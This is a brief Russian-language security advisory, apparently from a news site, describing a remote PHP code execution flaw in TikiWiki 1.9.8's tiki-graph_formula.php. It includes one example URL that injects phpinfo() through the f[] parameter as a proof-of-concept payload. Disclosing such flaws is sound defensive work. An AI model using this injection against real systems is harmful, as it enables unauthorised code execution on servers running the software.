Программа: TikiWiki 1.9.8

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в сценарии tiki-graph_formula.php. Атакующий может передать специально сформированные данные, что приведет к выполнению произвольного кода.

Пример:

http://www.example.com/tikiwiki/tiki-graph_formula.php?w=1&h=1 &s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=



Оставить мнение